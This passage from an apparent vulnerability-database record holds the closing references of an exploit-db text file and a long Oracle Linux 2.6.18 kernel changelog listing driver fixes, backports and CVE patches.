Capacity), Linux Programmer's Manual.\n- Linkers and Loaders, John R. 
Levine, ISBN 1-55860-496-0.\n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574\n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html\n\nYou should subscribe to Linux Weekly News and help support their high standard\nof security journalism.\n\nhttp://lwn.net/\n\nI have a twitter account where I occasionally comment on security topics.\n\nhttp://twitter.com/taviso\n\nex$$", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/linux/local/15274.txt", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:49", "description": "[2.6.18-164.el5]\n- [misc] information leak in sigaltstack (Vitaly Mayatskikh ) [515396]\n- [misc] execve: must clear current->clear_child_tid (Oleg Nesterov ) [515429]\n- [net] igb: set lan id prior to configuring phy (Stefan Assmann ) [508870]\n- [net] udp: socket NULL ptr dereference (Vitaly Mayatskikh ) [518043] {CVE-2009-2698}\n[2.6.18-163.el5]\n- [net] make sock_sendpage use kernel_sendpage (Danny Feng ) [516955] {CVE-2009-2692}\n[2.6.18-162.el5]\n- [x86_64] Intel IOMMU: Pass Through Support (Don Dutile ) [504363]\n[2.6.18-161.el5]\n- [dlm] free socket in error exit path (David Teigland ) [508829]\n- [net] tg3: fix concurrent migration of VM clients (John Feeney ) [511918]\n- [scsi] mptfusion: revert to pci_map (Tomas Henzl ) [514049]\n- [scsi] bnx2i: fix conn disconnection bugs (mchristi@redhat.com ) [513802]\n- [scsi] qla2xxx: unable to destroy npiv HBA ports (Marcus Barrow ) [514352]\n- [scsi] ALUA: send STPG if explicit and implicit (mchristi@redhat.com ) [482737]\n- [scsi] megaraid: fix the tape drive issue (Tomas Henzl ) [510665]\n- [scsi] cxgb3i: fix skb allocation (mchristi@redhat.com ) [514073]\n- [fs] __bio_clone: dont calculate hw/phys segment counts (Milan Broz ) [512387]\n- [fs] ecryptfs: check tag 11 packet data buffer size (Eric Sandeen ) [512863] 
{CVE-2009-2406}\n- [fs] ecryptfs: check tag 3 packet encrypted key size (Eric Sandeen ) [512887] {CVE-2009-2407}\n- [xen] amd iommu: crash with pass-through on large memory (Bhavna Sarathy ) [514910]\n[2.6.18-160.el5]\n- [scsi] mptsas: fix max_id initialization (mchristi@redhat.com ) [455678]\n- [ata] ahci: add IDs for Ibex Peak ahci controllers (David Milburn ) [513067]\n- [scsi] lpfc: update to 8.2.0.48.2p, fix multiple panics (Rob Evers ) [512266]\n- [gfs2] remove dcache entries for remote deleted inodes (Benjamin Marzinski ) [505548]\n- [alsa] add native support for IbexPeak audio (Jaroslav Kysela ) [509526]\n- [alsa] IbexPeak related patches for codec auto-config (Jaroslav Kysela ) [509526]\n- [scsi] cciss: call bus_unregister in cciss_remove_one (Rob Evers ) [513070]\n- [scsi] cciss: add driver sysfs entries (Rob Evers ) [513070]\n- [net] e1000e/igb: make sure wol can be configured (Andy Gospodarek ) [513032]\n- [fs] xfs: only compile for x86_64 (Eric Sandeen ) [512827]\n- [ahci] add SATA GEN3 related messages (David Milburn ) [512086]\n- [net] tun/tap: open /dev/net/tun and then poll() it fix (Danny Feng ) [512286] {CVE-2009-1897}\n- [net] mlx4_en: problem with LRO that segfaults KVM host (Doug Ledford ) [510789]\n- [openib] mthca: fix over sized kmalloc usage (Doug Ledford ) [508902]\n- [s390] zcrypt: request gets timed out under high load (Hans-Joachim Picht ) [511289]\n[2.6.18-159.el5]\n- [scsi] cciss: fix sysfs broken symlink regression (Rob Evers ) [510178]\n- [kabi] add consume_skb (Jon Masters ) [479200]\n- [net] ipv6: fix incorrect disable_ipv6 behavior (jolsa@redhat.com ) [512258]\n- [net] ipv6: fix BUG when disabled module is unloaded (jolsa@redhat.com ) [512258]\n- [net] ipv6: add 'disable' module parameter support (jolsa@redhat.com ) [512258]\n- Revert: [mm] fix swap race in fork-gup patch group (Larry Woodman ) [508919]\n- [scsi] mptfusion: fix OOPS in failover path (Rob Evers ) [504835]\n- [scsi] stex: minimize DMA coherent allocation (David 
Milburn ) [486466]\n- [misc] personality handling: fix PER_CLEAR_ON_SETID (Vitaly Mayatskikh ) [508842]\n- [misc] build with -fno-delete-null-pointer-checks (Eugene Teo ) [511181]\n- [scsi] qla2xxx: provide reset capability for EEH (Marcus Barrow ) [511141]\n- [scsi] bnx2i: fix host setup and libiscsi abort locking (mchristi@redhat.com ) [511096]\n- [xen] ia64: fix rmmod of PCI devices (Chris Lalancette ) [507520]\n- [pci] kvm: PCI FLR support for device assignment (Don Dutile ) [510805]\n- [gfs2] dont put unlikely reclaim glocks on reclaim list (Benjamin Marzinski ) [504335]\n[2.6.18-158.el5]\n- [s390] add missing kernel option CONFIG_SHARED_KERNEL (Hans-Joachim Picht ) [506947]\n- [gfs2] fix incorrent statfs_slow consistency check (Benjamin Marzinski ) [505171]\n- [net] be2net: fix msix performance regression (Andy Gospodarek ) [510008]\n- [gfs2] umount.gfs2 hangs eating CPU (Abhijith Das ) [508876]\n- [block] protect the per-gendisk partition array with rcu (Jeff Moyer ) [495866]\n- [net] igb: fix panic when assigning device to guest (Andy Gospodarek ) [507173]\n- [ia64] xen: dom0 get/set_address_size (Chris Lalancette ) [510069]\n- [x86] fix suspend/resume issue on SB800 chipset (Bhavna Sarathy ) [498135]\n- [scsi] cciss: fix spinlock (Tomas Henzl ) [509818]\n- [scsi] qla2xxx: NPIV broken for PPC, endian fix (Marcus Barrow ) [510268]\n- [scsi] qla2xxx: prevent hangs in extended error handling (Marcus Barrow ) [470510]\n- [mm] prevent softlockups in copy_hugetlb_page_range (Larry Woodman ) [508919]\n- [scsi] cxgb3i: fix vlan support (mchristi@redhat.com ) [508409]\n- [net] bnx2i: RHEL-5.4 code cleanups (mchristi@redhat.com ) [504181]\n- [x86_64] import asm/svm.h and asm/vmx.h (Eduardo Habkost ) [507483]\n- [x86_64] import asm/virtext.h (Eduardo Habkost ) [507483]\n- [x86_64] add MSR_VM_* defines (Eduardo Habkost ) [507483]\n- [x86_64] disable VMX and SVM on machine_crash_shutdown (Eduardo Habkost ) [507483]\n- [x86_64] add EFER_SVME define (Eduardo Habkost ) 
[507483]\n- [x86_64] define X86_CR4_VMXE (Eduardo Habkost ) [507483]\n- [net] qlge: rhel-5.4 cleanups (Marcus Barrow ) [509647]\n- [scsi] lpfc: fix ctx_idx increase and update version (Rob Evers ) [509010]\n- [scsi] lpfc: move pointer ref. inside alloc check in (Rob Evers ) [509010]\n- [scsi] lpfc: update to version 8.2.0.48 (Rob Evers ) [509010]\n- [mm] fix re-read performance regression (Josef Bacik ) [506511]\n- [net] ipsec: add missing braces to fix policy querying (Herbert Xu ) [462731]\n- [net] tg3: 5785F and 50160M support (Andy Gospodarek ) [506205]\n- [pci] intel-iommu: fix iommu address space allocation (Chris Wright ) [509207]\n- [xen] virtio: do not statically allocate root device (Mark McLoughlin ) [501468]\n- [xen] virtio: add PCI device release function (Mark McLoughlin ) [501468]\n- [misc] driver core: add root_device_register (Mark McLoughlin ) [501468]\n- [block] blktrace: fix recursive block remap tracepoint (Jason Baron ) [502573]\n- [scsi] qla2xxx: rhel-5.4 fixes and cleanups (Marcus Barrow ) [507246]\n- [xen] HV: remove high latency spin_lock (Chris Lalancette ) [459410]\n- [xen] ia64: add get/set_address_size support (Chris Lalancette ) [510069]\n[2.6.18-157.el5]\n- [mm] readv: sometimes returns less than it should (Amerigo Wang ) [500693]\n- [net] be2net: fix races in napi and interrupt handling (Andy Gospodarek ) [508839]\n- [net] be2net: fix deadlock with bonding (Andy Gospodarek ) [508871]\n- [xen] quiet printk on FV guest shutdown (Don Dutile ) [501474]\n- [fs] fuse: enable building the subsystem (Josef Bacik ) [457975]\n- [gfs2] fix panic in glock memory shrinker (Benjamin Marzinski ) [508806]\n- [net] rt2x00: use mac80211-provided workqueue (John W. 
Linville ) [506845]\n- [pci] quirk: disable MSI on VIA VT3364 chipsets (Dean Nelson ) [501374]\n- [net] undo vlan promiscuity count when unregistered (Neil Horman ) [481283]\n- [net] be2net: crash on PPC with LRO and jumbo frames (Andy Gospodarek ) [508404]\n- [net] RTNL: assertion failed due to bonding notify (Stanislaw Gruszka ) [508297]\n- [scsi] ibmvfc: process async events before cmd responses (AMEET M. PARANJAPE ) [508127]\n- [scsi] ibmvfc: fix endless PRLI loop in discovery (AMEET M. PARANJAPE ) [508127]\n- [scsi] ibmvfc: improve LOGO/PRLO ELS handling (AMEET M. PARANJAPE ) [508127]\n- [net] iucv: provide second per-cpu cmd parameter block (Hans-Joachim Picht ) [503240]\n- [net] sky2: /proc/net/dev statistics are broken (Flavio Leitner ) [507932]\n- [scsi] qla2xxx: prevent I/O stoppage (Marcus Barrow ) [507620]\n- [scsi] qla2xxx: updates 24xx firmware to 4.04.09 (Marcus Barrow ) [507398]\n- [scsi] qla2xxx: updates 25xx firmware to 4.04.09 (Marcus Barrow ) [507398]\n- [scsi] qla4xxx: extended sense data errors, cleanups (Marcus Barrow ) [506981]\n- [char] tty: prevent an O_NDELAY writer from blocking (Mauro Carvalho Chehab ) [506806]\n- [xen] allow msi reconfigure for pt_bind_irq (ddugger@redhat.com ) [507970]\n[2.6.18-156.el5]\n- [misc] kdump: make mcp55 chips work (Neil Horman ) [462519]\n- [ide] enable VX800 to use UDMA mode (John Feeney ) [504121]\n- [misc] wacom: reset state when tool is not in proximity (Aristeu Rozanski ) [499870]\n- [scsi] lpfc: update to version 8.2.0.46 (Rob Evers ) [506792]\n- [mm] prevent panic in copy_hugetlb_page_range (Larry Woodman ) [507860]\n- [gfs2] keep statfs info in sync on grows (Benjamin Marzinski ) [494885]\n- [gfs2] always queue work after after setting GLF_LOCK (Benjamin Marzinski ) [506140]\n- [scsi] cxgb3i: use kref to track ddp, support page sizes (mchristi@redhat.com ) [506151]\n- [security] drop mmap_min_addr to 4096 (Eric Paris ) [507017]\n- [misc] hrtimer: fix a soft lockup (Amerigo Wang ) [418071] 
{CVE-2007-5966}\n- [net] backport net_rx_action tracepoint (Neil Horman ) [506138]\n- [gfs2] fix truncate buffered/direct I/O issue (Steven Whitehouse ) [504676]\n- [xen] x86: fix IRQ problem on legacy hardware (ddugger@redhat.com ) [505491]\n- [xen] disable 2MB support on PAE kernels (Bhavna Sarathy ) [503737]\n[2.6.18-155.el5]\n- [mm] fix swap race condition in fork-gup-race patch (Andrea Arcangeli ) [506684]\n- [net] e1000e: stop unnecessary polling when using msi-x (Andy Gospodarek ) [506841]\n[2.6.18-154.el5]\n- [kABI] add smp_send_reschedule and get_user_pages_fast (Jon Masters ) [504038]\n- [scsi] lpfc: update to version 8.2.0.45 (Rob Evers ) [505445]\n- [fs] ext4: fix prealloc vs truncate corruption (Eric Sandeen ) [505601]\n- [net] r8169: fix crash when large packets are received (Ivan Vecera ) [504732] {CVE-2009-1389}\n- [pci] fix pcie save restore patch (Don Dutile ) [505541]\n- [scsi] ibmvscsi: add 16 byte CDB support (AMEET M. PARANJAPE ) [502944]\n- [infiniband] iw_cxgb3: add final fixups for 1.4.1 (Doug Ledford ) [504906]\n- [infiniband] mlx4_en: hand remove XRC support (Doug Ledford ) [506097]\n- [infiniband] cxgb3: update firmware from 7.1 to 7.4 (Doug Ledford ) [504955]\n- [infiniband] ofed: backports from ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [infiniband] RDS: Update to ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [infiniband] mthca: update to ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [net] cxgb3: support two new phys and page mapping fix (Doug Ledford ) [504955]\n- [infiniband] ipoib/sdp: update to ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [infiniband] OFED: back out XRC patch, not ready yet (Doug Ledford ) [506097]\n- [infiniband] mlx4_en: update to ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [infiniband] iw_nes: update to ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [infiniband] OFED: fix broken switch statement (Doug Ledford ) [506097]\n- [infiniband] OFED: removes this backport and all callers 
(Doug Ledford ) [506097]\n- [infiniband] iw_cxgb3: update to ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [infiniband] mlx4_ib: update to ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [infiniband] remove duplicate definition (Doug Ledford ) [500368]\n- [net] be2net: add intial support (Andy Gospodarek ) [490074]\n- [net] ixgbe: backport fixups and bugfixes for 82599 (Andy Gospodarek ) [505653]\n- [md] increase pg_init_in_progress only if work is queued (Jesse Larrew ) [489582]\n- [x86_64] AMD IOMMU: fix GLX issue in bare metal (Bhavna Sarathy ) [504010]\n- [scsi] libsas: use the supplied address for SATA devices (David Milburn ) [494658]\n- [x86_64] amd iommu: fix kdump unknown partition table (Bhavna Sarathy ) [504751]\n- [char] TPM: get_event_name stack corruption (Dean Nelson ) [503905]\n- [net] e1000e: update to upstream version 1.0.2-k2 (Andy Gospodarek ) [480241]\n- [crypto] add continuous test to hw rng in FIPS mode (Neil Horman ) [504218]\n- [net] ehea: fix invalid pointer access (AMEET M. 
PARANJAPE ) [504679]\n- [x86_64] amd iommu: fix spinlock imbalance (Bhavna Sarathy ) [501571]\n- [x86_64] iommu: protect against broken IVRS ACPI table (Bhavna Sarathy ) [501571]\n- [x86_64] amd iommu: fix flag masks (Bhavna Sarathy ) [501571]\n- [x86_64] iommu: fix the handling of device aliases (Bhavna Sarathy ) [501571]\n- [x86_64] amd iommu: fix an off-by-one error (Bhavna Sarathy ) [501571]\n- [xen] x86: give dom0 access to machine e820 map (ddugger@redhat.com ) [503818]\n- [pci] fix sr-iov regression with PCI device class (ddugger@redhat.com ) [503826]\n- [scsi] qla4xxx: extended sense data errors (Marcus Barrow ) [489389]\n- [scsi] qla4xxx: remove some dead code (Marcus Barrow ) [459449]\n- [net] qla2xxx, ql8xxx : support for 10 GigE (Marcus Barrow ) [479288]\n[2.6.18-153.el5]\n- [s390x] zfcpdump: move zfcpdump kernel removal to %post (Don Zickus ) [499629]\n- [x86_64] kvm: fix libvirt based device assignment issue (Bhavna Sarathy ) [504165]\n- [gfs2] get gfs2meta superblock correctly (Benjamin Marzinski ) [504086]\n- [ptrace] fix do_coredump vs ptrace_start() deadlock (Oleg Nesterov ) [504157] {CVE-2009-1388}\n- [scsi] ipr: fix PCI permanent error handler (AMEET M. PARANJAPE ) [503960]\n- [scsi] IPR: adapter taken offline after first EEH error (AMEET M. PARANJAPE ) [504675]\n- [scsi] lpfc: update to version 8.2.0.44 (Rob Evers ) [503248]\n- [net] skb_seq_read: wrong offset/len for page frag data (mchristi@redhat.com ) [501308]\n- [xen] netback: change back to a flipping interface (Chris Lalancette ) [479754]\n- [fs] autofs4: remove hashed check in validate_wait (Ian Kent ) [490078]\n- [ppc64] resolves issues with pcie-save-restore-state (AMEET M. 
PARANJAPE ) [504198]\n- [net] gso: stop fraglists from escaping (Herbert Xu ) [499347]\n- [tun] use non-linear packets where possible (Herbert Xu ) [503309]\n- [net] skb_copy_datagram_from_iovec (Herbert Xu ) [503309]\n- [net] tun: only wake up writers (Herbert Xu ) [503191]\n- Re-apply: [net] tun: add packet accounting (Don Zickus ) [495863]\n- [sched] fix cond_resched_softirq() offset (Jesse Larrew ) [496935]\n- [ata] sata_sx4: fixup interrupt and exception handling (David Milburn ) [503827]\n- Revert: [net] avoid extra wakeups in wait_for_packet (Don Zickus ) [497897]\n- [net] e1000: fix skb_over_panic (Neil Horman ) [503441] {CVE-2009-1385}\n[2.6.18-152.el5]\n- [x86_64] kvm: export symbols to allow building (john cooper ) [504038]\n- [misc] s390 zfcpdump: check for another image on removal (Hans-Joachim Picht ) [499629]\n- [net] ixgbe: fix MSI-X allocation on 8+ core systems (Andy Gospodarek ) [500857]\n- [s390] dasd: add EMC ioctl to the driver (Christoph Hellwig ) [461288]\n- [net] ixgbe: fix polling saturates CPU (Andy Gospodarek ) [503559]\n- [misc] core dump: wrong thread info in core dump file (Amerigo Wang ) [503553]\n- [crypto] testmgr: check all test vector lengths (Jarod Wilson ) [503091]\n- [net] igb and igbvf: return from napi poll correctly (Andy Gospodarek ) [503215]\n- [crypto] testmgr: dynamically allocate xbuf and axbuf (Jarod Wilson ) [503091]\n- [fs] vfs: skip I_CLEAR state inodes in drop_pagecache_sb (Eric Sandeen ) [500164]\n- Revert: [net] tun: add packet accounting (Herbert Xu ) [495863]\n- [net] netxen: add GRO Support (Herbert Xu ) [499347]\n- [nfs] v4: 'r'/'w' perms for user do not work on client (Peter Staubach ) [502244]\n- [x86] nmi: add Intel cpu 0x6f4 to perfctr1 workaround (Prarit Bhargava ) [500892]\n- [dm] raid45 target: kernel oops in constructor (Heinz Mauelshagen ) [503070]\n- [net] sky2: fix sky2 stats (Neil Horman ) [503080]\n- [acpi] check _PSS frequency to prevent cpufreq crash (Prarit Bhargava ) [500311]\n- [scsi] 
mvsas: sync w/ appropriate upstream changes (Rob Evers ) [485126]\n- [scsi] mvsas: comment cleanup (Rob Evers ) [485126]\n- [scsi] mvsas: correct bit-map implementation (Rob Evers ) [485126]\n- [scsi] mvsas: initial patch submission (Rob Evers ) [485126]\n- [net] add broadcom cnic driver (mchristi@redhat.com ) [441979]\n- [scsi] add bnx2i iscsi driver (mchristi@redhat.com ) [441979]\n- [scsi] add netlink msg to iscsi IF to support offload (mchristi@redhat.com ) [441979]\n- [misc] add UIO framework from upstream (mchristi@redhat.com ) [441979]\n- [net] add cnic support to bnx2 (mchristi@redhat.com ) [441979]\n- [powerpc] pass the PDN to check_msix_entries (AMEET M. PARANJAPE ) [502906]\n- [fs] proc: avoid info leaks to non-privileged processes (Amerigo Wang ) [499541]\n- [net] ixgbe: add GRO suppport (Herbert Xu ) [499347]\n- [net] igb: add GRO suppport (Herbert Xu ) [499347]\n- [net] cxgb3: add GRO suppport (Herbert Xu ) [499347]\n- [net] vlan: add GRO interfaces (Herbert Xu ) [499347]\n- [net] tcp6: add GRO support (Herbert Xu ) [499347]\n- [net] ipv6: add GRO support (Herbert Xu ) [499347]\n- [net] ethtool: add GGRO and SGRO ops (Herbert Xu ) [499347]\n- [net] tcp: add GRO support (Herbert Xu ) [499347]\n- [net] add skb_gro_receive (Herbert Xu ) [499347]\n- [net] ipv4: add GRO infrastructure (Herbert Xu ) [499347]\n- [net] add Generic Receive Offload infrastructure (Herbert Xu ) [499347]\n- [net] add frag_list support to GSO (Herbert Xu ) [499347]\n- [net] add frag_list support to skb_segment (Herbert Xu ) [499347]\n- [net] skbuff: add skb_release_head_state (Herbert Xu ) [499347]\n- [net] skbuff: merge code copy_skb_header and skb_clone (Herbert Xu ) [499347]\n- [netfilter] nf_conntrack: add __nf_copy to copy members (Herbert Xu ) [499347]\n- [net] skbuff: add skb_cow_head (Herbert Xu ) [499347]\n- [net] netpoll: backport netpoll_rx_on (Herbert Xu ) [499347]\n- [net] gro: Optimise Ethernet header comparison (Herbert Xu ) [499347]\n- [net] backport 
csum_replace4/csum_replace2 (Herbert Xu ) [499347]\n- [net] backport csum_unfold without sparse annotations (Herbert Xu ) [499347]\n- [net] sky2: fix eeprom reads (Neil Horman ) [501050]\n- [nfs] v4: client handling of MAY_EXEC in nfs_permission (Peter Staubach ) [500302] {CVE-2009-1630}\n- [net] forcedeth: restore power up snippet (Ivan Vecera ) [479740]\n- [md] dm: I/O failures when running dm-over-md with xen (Mikulas Patocka ) [223947]\n- [selinux] warn on nfs mounts with same SB but diff opts (Eric Paris ) [466701]\n[2.6.18-151.el5]\n- [alsa] hda: improve init for ALC262_HP_BPC model (Jaroslav Kysela ) [473949]\n- [ppc] LPAR hang on multipath device with FCS v2 (AMEET M. PARANJAPE ) [498927]\n- [fs] nfsd: fix setting the nfsv4 acls (Steve Dickson ) [403021]\n- [scsi] fnic: compile on x86 too (mchristi@redhat.com ) [501112]\n- [net] avoid extra wakeups in wait_for_packet (Neil Horman ) [497897]\n- [x86] xen: fix local denial of service (Chris Lalancette ) [500951]\n- [scsi] ibmvfc: wait on adapter init before starting scan (AMEET M. PARANJAPE ) [501560]\n- [net] bnx2x: update to 1.48.105 (Stanislaw Gruszka ) [475481]\n- [xen] add Credit Scheduler Fairness and hard virt (Justin M. Forbes ) [432700]\n- [xen] deadlock between libvirt and xentop (Miroslav Rezanina ) [499013]\n- [xen] sched: remove printk introduced with hard virt (Justin M. Forbes ) [501475]\n[2.6.18-150.el5]\n- [kabi] add cmirror symbols to kABI (Jon Masters ) [500745]\n- Revert: [sched] accurate task runtime accounting (Linda Wang ) [297731] {CVE-2007-3719}\n- [alsa] hda: add missing comma in ad1884_slave_vols (Jeff Burke ) [500626]\n- [x86] remove xtime_lock from time_cpufreq_notifier (Prarit Bhargava ) [501178]\n- [fs] cifs: fix pointer and checks in cifs_follow_symlink (Jeff Layton ) [496577] {CVE-2009-1633}\n- [fs] ext4: corruption fixes (Eric Sandeen ) [501082]\n- [lockdep] dont omit lock_set_subclass (Aristeu Rozanski ) [462248]\n- [ppc] cell: make ptcal more reliable (AMEET M. 
PARANJAPE ) [501356]\n- [x86] include asm-x86_64 in i686-devel package (Don Zickus ) [491775]\n- [misc] compile: add -fwrapv to gcc CFLAGS (Don Zickus ) [491266]\n- [trace] mm: eliminate extra mm tracepoint overhead (Larry Woodman ) [501013]\n- [dlm] use more NOFS allocation (Abhijith Das ) [460218]\n- [dlm] connect to nodes earlier (Abhijith Das ) [460218]\n- [wireless] mac80211: freeze when ath5k IF brought down (Michal Schmidt ) [499999]\n- [audit] watch: fix removal of AUDIT_DIR rule on rmdir (Alexander Viro ) [501321]\n- [trace] sunrpc: adding trace points to status routines v2 (Steve Dickson ) [499008]\n- [misc] random: make get_random_int more random (Amerigo Wang ) [499776]\n- [md] retry immediate in 2 seconds (Jesse Larrew ) [489582]\n- [scsi] retry for NOT_READY condition (Jesse Larrew ) [489582]\n- [md] handle multiple paths in pg_init (Jesse Larrew ) [489582]\n- [scsi] fix compilation error (Jesse Larrew ) [489582]\n- [scsi] add LSI storage IDs (Jesse Larrew ) [489582]\n- [scsi] handle quiescence in progress (Jesse Larrew ) [489582]\n- [scsi] retry IO on unit attention (Jesse Larrew ) [489582]\n- [scsi] handle unit attention in mode select (Jesse Larrew ) [489582]\n- [scsi] make the path state active by default (Jesse Larrew ) [471426]\n- [scsi] Retry mode select in rdac device handler (Jesse Larrew ) [489582]\n[2.6.18-149.el5]\n- [acpi] updated dock driver for RHEL-5.4 (Matthew Garrett ) [485181]\n- [infiniband] ib_core: use weak ordering for user memory (AMEET M. 
PARANJAPE ) [501004]\n- [mm] fork-o_direct-race v3 (aarcange@redhat.com ) [471613]\n- [nfs] make nfsv4recoverydir proc file readable (Evan McNabb ) [499840]\n- [pci] remove pci-stub driver from -xen kernels (Don Dutile ) [500568]\n- [pci] IOMMU phys_addr cleanup (Don Dutile ) [500901]\n- [pci] missed fix to pci_find_upstream_pcie_bridge (Don Dutile ) [500901]\n- [misc] IOMMU MSI header cleanup (Don Dutile ) [500901]\n- [scsi] megaraid: update megasas to 4.08-RH1 (Tomas Henzl ) [475574]\n- [fs] nfs: fix an f_mode/f_flags confusion in write.c (Jeff Layton ) [490181]\n- [fs] cifs: renaming dont try to unlink negative dentry (Jeff Layton ) [500839]\n- [fs] cifs: fix error handling in parse_DFS_referrals (Jeff Layton ) [496577] {CVE-2009-1633}\n- [scsi] aacraid: update to 1.1.5-2461 (Rob Evers ) [475559]\n- [md] dm raid45: dont clear the suspend flag on recovery (Heinz Mauelshagen ) [499406]\n- [net] cxgb3: update driver for RHEL-5.4 (mchristi@redhat.com ) [439518]\n- [scsi] add cxgb3i iscsi driver (mchristi@redhat.com ) [439518]\n- [scsi] port upstream offload code to RHEL-5.4 (mchristi@redhat.com ) [439518]\n- [scsi] force retry of IO when port/session is changing (mchristi@redhat.com ) [498281]\n- [net] igbvf: new driver, support 82576 virtual functions (Andy Gospodarek ) [480524]\n- [net] ehea: fix circular locking problem (AMEET M. 
PARANJAPE ) [493359]\n- [s390] appldata: vtimer bug with cpu hotplug (Hans-Joachim Picht ) [497207]\n[2.6.18-148.el5]\n- Revert: [mm] fork vs fast gup race fix (Andrea Arcangeli ) [471613]\n[2.6.18-147.el5]\n- Revert: [scsi] marvell sas: initial patch submission (Rob Evers ) [485126]\n- Revert: [scsi] marvell sas: correct bit-map implementation (Rob Evers ) [485126]\n- Revert: [scsi] marvell sas: comment cleanup (Rob Evers ) [485126]\n- [misc] FIPS: create checksum for verification at bootup (Don Zickus ) [444632]\n- [md] dm: raid45 target oops on mapping table reload (Heinz Mauelshagen ) [500387]\n- [md] dm: raid45 target doesnt create parity as expected (Heinz Mauelshagen ) [499406]\n- [net] igb: correctly free multiqueue netdevs (Andy Gospodarek ) [500446]\n- [misc] lockdep: fix large lock subgraph traversal (Aristeu Rozanski ) [462248]\n- [crypto] make tcrypt stay loaded on success (Jarod Wilson ) [499646]\n- [crypto] block use of non-fips algs in fips mode (Jarod Wilson ) [499646]\n- [crypto] mark algs allowed in fips mode (Jarod Wilson ) [499646]\n- [x86_64] 32-bit ptrace emulation mishandles 6th arg (Jiri Olsa ) [495125]\n- [fs] cifs: buffer overruns when converting strings (Jeff Layton ) [496577]\n- [scsi] lpfc: update from version 8.2.0.41 to 8.2.0.43 (Rob Evers ) [498524]\n- [cpufreq] xen: powernow identifies wrong number of procs (Miroslav Rezanina ) [456437]\n- [scsi] MPT fusion: remove annoying debug message v2 (Tomas Henzl ) [475455]\n- [scsi] MPT fusion: make driver legacy I/O port free v2 (Tomas Henzl ) [475451]\n- [scsi] MPT fusion: update version 3.04.07rh v2 (Tomas Henzl ) [475455]\n- [ia64] fix regression in nanosleep syscall (Prarit Bhargava ) [499289]\n- [md] s390: I/O stall when performing random CHPID off/on (Mikulas Patocka ) [500729]\n- [crypto] add hmac and hmac(sha512) test vectors (Jarod Wilson ) [499463]\n- [sched] accurate task runtime accounting (Peter Zijlstra ) [297731] {CVE-2007-3719}\n- [sched] rq clock (Peter Zijlstra ) [297731] 
{CVE-2007-3719}\n- [x86] scale cyc_2_nsec according to CPU frequency (Peter Zijlstra ) [297731] {CVE-2007-3719}\n- [i386] untangle xtime_lock vs update_process_times (Peter Zijlstra ) [297731] {CVE-2007-3719}\n- [x86_64] clean up time.c (Peter Zijlstra ) [297731] {CVE-2007-3719}\n- [net] tun: add packet accounting (Herbert Xu ) [495863]\n- [kabi] add pcie_set_readrq (Jon Masters ) [479200]\n- [kabi] add Kernel Virtual Machine kABI symbols (Jon Masters ) [466961]\n- [crypto] add ctr test vectors (Jarod Wilson ) [497888]\n- [crypto] print self-test success notices in fips mode (Jarod Wilson ) [497885]\n- [mm] fork vs fast gup race fix (Andrea Arcangeli ) [471613]\n- [mm] support for lockless get_user_pages (aarcange@redhat.com ) [474913]\n- Revert: [mm] fork vs gup race fix (aarcange@redhat.com ) [471613]\n- [net] r8169: reset IntrStatus after chip reset (Ivan Vecera ) [500740]\n- Revert: [net] forcedeth: power down phy when IF is down (Ivan Vecera ) [479740]\n- [misc] add AMD IOMMU support to KVM (Bhavna Sarathy ) [481026]\n- [misc] VT-d: backport of Intel VT-d support to RHEL5 (Don Dutile ) [480411]\n- [misc] VT-d: add clflush_cache_range function (Don Dutile ) [480411]\n- [misc] VT-d: add DMAR-related timeout definition (Don Dutile ) [480411]\n- [misc] VT-d: add DMAR ACPI table support (Don Dutile ) [480411]\n- [misc] VT-d: add pci_find_upstream_pcie_bridge (Don Dutile ) [480411]\n- [misc] VT-d: move common MSI defines to msi.h (Don Dutile ) [480411]\n- [trace] blk tracepoints (Arnaldo Carvalho de Melo ) [493454]\n- [pci] enable CONFIG_PCI_IOV (ddugger@redhat.com ) [493152]\n- [pci] save and restore PCIe 2.0 registers (ddugger@redhat.com ) [493152]\n- [pci] restore PCI-E capability registers after PM event (ddugger@redhat.com ) [493152]\n- [pci] add SR-IOV API for Physical Function driver (ddugger@redhat.com ) [493152]\n- [pci] centralize device setup code (ddugger@redhat.com ) [493152]\n- [pci] reserve bus range for SR-IOV device (ddugger@redhat.com ) [493152]\n- 
[pci] restore saved SR-IOV state (ddugger@redhat.com ) [493152]\n- [pci] initialize and release SR-IOV capability (ddugger@redhat.com ) [493152]\n- [pci] add a new function to map BAR offsets (ddugger@redhat.com ) [493152]\n- [pci] allow pci_alloc_child_bus to handle a NULL bridge (ddugger@redhat.com ) [493152]\n- [pci] enhance pci_ari_enabled (ddugger@redhat.com ) [493152]\n- [pci] fix ARI code to be compatible with mixed systems (ddugger@redhat.com ) [493152]\n- [pci] support PCIe ARI capability (ddugger@redhat.com ) [493152]\n- [pci] export __pci_read_base (ddugger@redhat.com ) [493152]\n- [pci] fix 64-vbit prefetchable memory resource BARs (ddugger@redhat.com ) [493152]\n- [pci] handle 64-bit resources better on 32-bit machines (ddugger@redhat.com ) [493152]\n- [pci] rewrite PCI BAR reading code (ddugger@redhat.com ) [493152]\n- [xen] add Credit Scheduler Fairness and hard virt (Justin M. Forbes ) [432700]\n- [xen] x86_64: add 1GB page table support (Bhavna Sarathy ) [251982]\n[2.6.18-146.el5]\n- [fs] vfs freeze: use vma->v_file to get to superblock (Eric Sandeen ) [476148]\n- [net] tg3: allow 5785 to work when running at 10Mbps (Andy Gospodarek ) [469772]\n- [net] af_iucv: race when queuing incoming iucv messages (Hans-Joachim Picht ) [499626]\n- [trace] sunrpc: adding trace points to status routines (Steve Dickson ) [499008]\n- [gfs2] fix glock ref count issue (Steven Whitehouse ) [485098]\n- [kabi] add acpi_bus_register_driver (Jon Masters ) [462911]\n- [kabi] add nobh_truncate_page and kernel_read (Jon Masters ) [497276]\n- [usb] support Huaweis mode switch in kernel (Pete Zaitcev ) [485182]\n- [scsi] ibmvscsi: LPAR 